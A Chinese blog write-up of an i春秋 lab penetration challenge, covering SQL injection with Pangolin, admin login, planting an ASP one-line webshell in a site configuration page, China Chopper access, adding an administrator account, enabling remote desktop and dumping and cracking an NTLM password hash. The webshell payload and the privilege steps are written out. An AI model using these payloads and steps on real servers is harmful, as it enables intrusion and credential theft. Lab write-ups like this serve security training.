【i春秋综合渗透训练】我很简单,请不要欺负我
【i春秋综合渗透训练】我很简单,请不要欺负我
摸了几天的?了,主要是不知道该干嘛~~
CTF题目不想做,只想玩玩英雄联盟,玩玩渗透靶机这亚子!
个人觉得不能这样混下去了,于是又来到了i春秋,发现除了CTF还有综合渗透训练这个系列~~
个人感觉挺好玩的,啊哈哈哈哈,开始了~~
实验环境
操作机:Windows XP
目标机:windows server 2003
实验工具: 中国菜刀 PR 御剑 Pangolin 3389.exe
为了给您带来更加公平的场景体验,竞技类实验场景不包含实验指导
实验过程
首先进入环境,可以看见提示:
OK,直接打开攻击机的浏览器访问下www.test.ichunqiu
根据要求我们需要明确我们的思路,首先是要求拿到服务器权限,
我们可以通过进入后台,上传shell,然后提权,一通花里胡哨的操作
可以进行简单的信息收集,看是不是什么cms
同时还发现是ASP脚本,操作系统应该是windows的,数据库应该是access或者mssql吧
因为Asp一般和access mssql搭建
然后可以用御剑扫描一下看看目录:
一大堆东西,发现疑似后台目录,访问一波:
果然是的,接下来就是尝试登陆了,弱口令,sql注入,万能密码,默认密码等,,,
试试弱口令好像不行,不过发现验证码都不会变,爆破貌似也行
搜索一下魅力网络科技有限公司后台默认密码试试,emmm没找到
万能密码貌似也不行,,,,不想抓包了,顺便抱怨一句,这个环境是真的,,,
那就进入下一步吧,回到主页随便点开一个页面,发现有个id,试试注入:
发现:
直接上穿山甲吧,就是实验环境中提及的工具,使用方法就不必多说了,直接日
日出密码,去解密一下:
ok,去后台试试登陆,成功进入:
寻找上传shell的地方,上传上传没找到,备份文件备份没找到,,,,
后来找到一个网站设置的页面:
进行一句话插入试试<%eval request("1")%>
,发现:
ok,重新尝试一下进行闭合,发现页面进不去了,,,,
直接选择重做吧,,,,
试试:"%><%eval request("1")%><%
emmm,又出现错误:
再次初始化进行"%><%eval request("1")%><%'
成功,返回正常页面:
上传成功了,接下来就要知道在什么地方啊
首页没得,看来应该是在什么配置文件里面了,直接看看御剑扫出来的
发现一个目录inc/config.asp猜测是不是在这里呢,直接菜刀链接一波试试:
发现直接成功,,,,,:
接下来就是找到有写权限的目录,并上传工具:
涂掉的是没用的工具,添加用户:
将用户添加到系统管理员组:
利用工具开启3389端口(估摸着3389.bat没用):
在本机上cmd中输入mstsc,输入靶机ip,链接输入账号密码登陆成功:
继续,上传密码破解工具,,,试了很久,使用cain这个工具,其他看不见administrators的密码:
例如:
上传之后,在服务器上安装好并打开,切换到“Cracker”标签下,点击“LM & NTLM Hashers”,点击右边表格区域,在点击上面蓝色的加号:
在出现的窗口中选中“Include Password History Hashes”,点击“NEXT”
之后将结果export,用记事本打开,可以得到:
得到的是Administrators用户的登录密码HASH,还需要破解
62C4700EBB05958F3832C92FC614B7D1:4D478675344541AACCF6CF33E1DD9D85
WINDOWS密码HASH破解
登陆成功:
题目答案
【i春秋综合渗透训练】我很简单,请不要欺负我相关推荐
- 【我很简单,请不要欺负我】模拟环境渗透详细记录
首先感谢i春秋提供的模拟环境,实验内容记录如下,部分步骤参考了官方攻略 实验地址如下: https://www.ichunqiu.com/racing/54399 下面开始实验内容记录: 实验环境构造 ...
- 爱春秋-在线挑战-综合渗透训练全部详解(更新中)
这次在爱春秋玩玩看它的综合渗透训练,这篇博客就做一个知识汇总好了,网上攻略很多,就多写一些注意要点和不同的方法,本人菜鸟级别,能过一关就更新一次. 我的新浪博客:http://blog.sina.co ...
- i春秋题库之真的很简单
题目:真的很简单 第一次模拟渗透测试记录 第一题:获取网站管理员的密码 第二题:获取网站后台目录名 第三题:获取管理员桌面flag信息 第一次模拟渗透测试记录 参考目录:[1]https://blog ...
- i春秋_我很简单_解题记录
实验工具: 中国菜刀 Pr 御剑 Pangolin 3389 0x01 拿到靶机环境,根据工具猜想,存在SQL注入漏洞 先用工具扫描一下,打开明小子 工具:旁注WEB综合检测程序Ver3.6修正版 路 ...
- 很简单的网络渗透过程
背景: 在2018年7月10号收到了一份邮件,竟然是标题是教务处邮件,如图: 服了,点进去果不其然这是一个钓鱼网站,我反正不会相信我大学能拿到奖学金的,并且都已经毕业快半个月了.然后想了想就想写一篇文 ...
- 01-在线挑战详细攻略-《我很简单,请不要欺负我》 http://bbs.ichunqiu.com/thread-1783-1-1.html (出处: i春秋社区-分享你的技术,为安全加点温度)
系列文章: 02-在线挑战详细攻略-<网站综合渗透实验> 03-在线挑战详细攻略-<又见DZ,我能拿你怎么办> 04-在线挑战详细攻略-<2015中国网络安全大赛:Rei ...
- 小说里的lt什么意思_一般加杠杆是什么意思股市里?答案很简单
测评网小编原创 阿基米德很著名的一句话,相信大家都知道,而应用到金融市场里来的话,很多人都会问加杠杆是什么意思股市里.其实就像标题说的那样,对于加杠杆是什么意思股市里的答案很简单. 为什么说简单呢?因 ...
- [在线挑战]【i春秋】渗透测试入门 —— 渗透测试笔记 --转
[i春秋]渗透测试入门 -- 渗透测试笔记,原文 0x00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS 的信息资讯平台 http://www.test. ...
- 考研计算机西电和大连理工大学教务处,高考或考研,大连理工大学和电子科技大学怎么选?其实很简单...
原标题:高考或考研,大连理工大学和电子科技大学怎么选?其实很简单 很多人高考或考研的时候,最容易纠结的就是如何选择大学,特别是碰上水平相当的2所大学,不知如何下手.就好像最近一个朋友就碰到了这个一个难 ...
最新文章
- 【一篇文章搞懂】Java社招最全面试题
- stderr和stdout(printf、fprintf、sprintf)(转)
- node.js 搭建http调取 mysql数据库中的值
- 介绍一个对陌生程序快速进行性能瓶颈分析的技巧
- Delphi 皮肤控件AlphaControls的使用
- Google Maps JavaScript API V3 官方网站
- TCP/IP报文头部结构
- [JZOJ4640] 【GDOI2017模拟7.15】妖怪
- Android心电数据分析,基于Android的心电信号分析系统研究
- python 编译器spyder 安装_Python环境安装Spyder
- android mp4 画面裁剪,说说Android的视频裁剪(三)
- 刘强东学习亚马逊:控制供应链 技术是最大障碍
- android gpuimage 直播,1小时学会:最简单的iOS直播推流(四)如何使用GPUImage,如何美颜...
- 获取网页链接里的视频原件
- CorelDRAWX4的C++插件开发(四十三)VBA的错误返回机制
- Latex中在字母上加上波浪线
- buck电路 dac stm32_嵌入式设计-基于STM32F334的BUCK同步降压数字电源设计-电路城论坛 - 电子工程师学习交流园地...
- cometd: Bayeux Protocol
- Parser-Free Virtual Try-on via Distilling Appearance Flows - 基于外观流提取的免解析器虚拟试穿
- 计算机培训教案入门,计算机二级学习基础PPT学习教案.pptx